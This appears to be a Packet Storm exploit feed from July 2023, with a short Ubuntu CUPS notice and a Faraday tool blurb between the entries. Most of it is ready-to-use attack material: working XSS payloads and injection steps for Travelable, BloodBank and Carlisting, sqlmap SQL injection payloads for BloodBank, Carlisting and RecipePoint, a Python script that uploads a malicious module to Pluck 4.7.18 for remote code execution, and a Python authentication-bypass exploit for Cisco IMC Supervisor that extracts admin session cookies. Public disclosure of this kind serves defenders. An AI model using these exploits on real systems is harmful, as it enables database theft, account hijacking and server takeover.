Travelable version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Travelable 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: travelmate.com# Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution# Software Link: https://travel.codeswithbipin.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /[random-number]/commentPOST parameter 'comment' is vulnerable to XSS-----------------------------------------------------------POST /[random-number]/comment HTTP/2_token=10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&name=cracker+infosec&email=cracker%40infosec.com&phone=%2B96171951951&comment=[XSS Payload]-----------------------------------------------------------## Steps to Reproduce:1. Surf as a (Guest User)2. Go to [Tour Packages] on this Path: https://website/packages3. Choose any package and click [Explore] Path: https://website/package/64. Scroll Down to the [Comments] section5. Inject your XSS Payload in [Comment Box]6. Click on [Submit]7. Every visitor to the page where you inject your [XSS Payload] - Path: https://website/package/68. XSS will fire and execute on his browser.[-] Done

Travelable 1.0 Cross Site Scripting

BloodBank version 1.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: BloodBank 1.1 - SQL Injection# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /bloodbank/searchPOST parameter 'country' is vulnerable to SQL InjectionPOST parameter 'city' is vulnerable to SQL InjectionPOST parameter 'blood_group_id' is vulnerable to SQL Injection-----------------------------------------------------------POST /bloodbank/search HTTP/2country=[SQLI]&city=[SQLI]&blood_group_id=[SQLI]&form_search=Search+Donor--------------------------------------------------------------Parameter: country (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&city=123&blood_group_id=2&form_search=Search+DonorParameter: city (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&blood_group_id=2&form_search=Search+DonorParameter: blood_group_id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: country=123&city=123&blood_group_id=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&form_search=Search+Donor---[-] Done

BloodBank 1.1 SQL Injection

Ubuntu Security Notice 6184-2 - USN-6184-1 fixed a vulnerability in CUPS. This update provides the corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that CUPS incorrectly handled certain memory operations. An attacker could possibly use this issue to cause CUPS to crash, resulting in a denial of service, or to possibly obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6184-2  
July 17, 2023

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

CUPS could be made to crash or expose sensitive information over the   
network.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

USN-6184-1 fixed a vulnerability in CUPS. This update provides the  
corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

  It was discovered that CUPS incorrectly handled certain memory operations.  
  An attacker could possibly use this issue to cause CUPS to crash,   
resulting  
  in a denial of service, or to possibly obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   cups                            2.2.7-1ubuntu2.10+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   cups                            2.1.3-4ubuntu0.11+esm3

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6184-2   
<https://ubuntu.com/security/notices/USN-6184-2>  
https://ubuntu.com/security/notices/USN-6184-1   
<https://ubuntu.com/security/notices/USN-6184-1>  
   CVE-2023-34241

Ubuntu Security Notice USN-6184-2

BloodBank version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: BloodBank 1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /bloodbank/page.phpURL parameter is vulnerable to RXSShttps://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2[-] Done

BloodBank 1.1 Cross Site Scripting

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.5.1

Carlisting version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Carlisting 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /carlisting/search.phpGET parameter 'country' is vulnerable to RXSSGET parameter 'state' is vulnerable to RXSSGET parameter 'city' is vulnerable to RXSShttps://website/carlisting/search.php?brand_id=1&model_id=1&car_condition=New%20Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=[XSS]&state=[XSS]&city=[XSS][-] Done

Carlisting 1.6 Cross Site Scripting

Pluck version 4.7.18 suffers from a remote code execution vulnerability.

    #Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)#Application: pluck#Version: 4.7.18#Bugs:  RCE#Technology: PHP#Vendor URL: https://github.com/pluck-cms/pluck#Software Link: https://github.com/pluck-cms/pluck#Date of found: 10-07-2023#Author: Mirabbas Ağalarov#Tested on: Linux import requestsfrom requests_toolbelt.multipart.encoder import MultipartEncoderlogin_url = "http://localhost/pluck/login.php"upload_url = "http://localhost/pluck/admin.php?action=installmodule"headers = {"Referer": login_url,}login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}file_path = input("ZIP file path: ")multipart_data = MultipartEncoder(    fields={        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),        "submit": "Upload"    })session = requests.Session()login_response = session.post(login_url, headers=headers, data=login_payload)if login_response.status_code == 200:    print("Login account")     upload_headers = {        "Referer": upload_url,        "Content-Type": multipart_data.content_type    }    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)        if upload_response.status_code == 200:        print("ZIP file download.")    else:        print("ZIP file download error. Response code:", upload_response.status_code)else:    print("Login problem. response code:", login_response.status_code)rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"rce=requests.get(rce_url)print(rce.text)

Pluck 4.7.18 Remote Code Execution

Carlisting version 1.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Carlisting 1.6 - SQL Injection# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /carlisting/search.phpGET parameter 'brand_id' is vulnerable to SQL InjectionGET parameter 'model_id' is vulnerable to SQL InjectionGET parameter 'car_condition' is vulnerable to SQL InjectionGET parameter 'car_category_id' is vulnerable to SQL InjectionGET parameter 'body_type_id' is vulnerable to SQL InjectionGET parameter 'fuel_type_id' is vulnerable to SQL InjectionGET parameter 'transmission_type_id' is vulnerable to SQL InjectionGET parameter 'year' is vulnerable to SQL InjectionGET parameter 'mileage_start' is vulnerable to SQL InjectionGET parameter 'mileage_end' is vulnerable to SQL InjectionGET parameter 'country' is vulnerable to SQL InjectionGET parameter 'state' is vulnerable to SQL InjectionGET parameter 'city' is vulnerable to SQL Injectionhttps://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]---Parameter: brand_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: model_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_condition (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_category_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: body_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: fuel_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: transmission_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: year (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_start (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_end (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=LosParameter: country (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=LosParameter: state (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=LosParameter: city (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW---[-] Done

Carlisting 1.6 SQL Injection

RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.

# Exploit Title: RecipePoint 1.9 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 15/07/2023  
# Vendor: phpscriptpoint  
# Vendor Homepage: https://phpscriptpoint.com/  
# Software Link: https://demo.phpscriptpoint.com/recipepoint/  
# Tested on: Windows 10 Pro  
# Impact: Database Access

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /recipepoint/recipe-result

GET parameter 'text' is vulnerable to SQL Injection  
GET parameter 'category' is vulnerable to SQL Injection  
GET parameter 'type' is vulnerable to SQL Injection  
GET parameter 'difficulty' is vulnerable to SQL Injection  
GET parameter 'cuisine' is vulnerable to SQL Injection  
GET parameter 'cooking_method' is vulnerable to SQL Injection

https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]

---  
Parameter: text (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

    Type: boolean-based blind  
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
    Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: category (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: type (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: difficulty (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1

Parameter: cuisine (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1

Parameter: cooking_method (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)  
---

[-] Done

RecipePoint 1.9 SQL Injection

Cisco UCS-IMC Supervisor version 2.2.0.0 suffers from an authentication bypass vulnerability.

    [+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass[+] Cisco IMC Supervisor - < 2.2.1.0[+] Date: 08/21/2019[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html[+] Vulnerability Discovery : Pedro Ribeiro[+] Exploit Author: Fatih Sencer[+] CVE: CVE-2019-1937----------------------------------------------------Usage:./python3 CiscoIMC-Bypass.py -u host[+] Target https://xxxxxx.com[+] Target OK[+] Exploit Succes[+] Login name : admin[+] Cookie : REACTED"""import argparse,requests,warnings,base64,json,random,stringfrom requests.packages.urllib3.exceptions import InsecureRequestWarningwarnings.simplefilter('ignore',InsecureRequestWarning)def init():    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')    parser.add_argument('-u','--host',help='Host', type=str, required=True)    args = parser.parse_args()    exploit(args)def exploit(args):    session = requests.Session()    headers = {        "User-Agent":                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",        "X-Requested-With":             "XMLHttpRequest",        "Referer":                      "https://{}/".format(args.host),        "X-Starship-UserSession-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),        "X-Starship-Request-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))    }    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)    print("[+] Target {}".format(args.host))        exp_send = session.get(target, headers=headers, verify=False, timeout=10)    if exp_send.status_code == 200:        print("[+] Target OK")        body_data = json.loads(exp_send.text)        if not (body_data.get('loginName') is None):            print("[+] Exploit Succes")            print("[+] Login name : {}".format(body_data.get('loginName')))            print("[+] Cookie : {}".format(session.cookies.get_dict()))        else:            print("[-] Exploit Failed")                else:        print("[-] N/A")        exit()if __name__ == "__main__":    init()

Source

Packet Storm